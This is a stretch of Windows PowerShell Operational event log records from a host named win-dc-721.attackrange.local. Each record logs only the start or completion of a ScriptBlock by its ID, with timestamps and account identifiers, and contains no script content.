SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476959
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476958
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476957
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476956
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476955
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476954
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476953
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476952
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476951
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476950
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476949
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476948
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476947
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476946
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476945
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476944
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476943
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476942
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476941
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476940
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476939
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476938
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476937
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476936
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476935
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476934
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476933
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476932
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476931
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476930
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476929
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476928
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476927
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476926
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476925
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476924
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476923
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476922
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476920
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476919
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476918
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476917
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476916
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476914
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476913
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476912
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476911
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476910
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476909
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476908
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476907
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476906
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476905
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:14 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476904
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
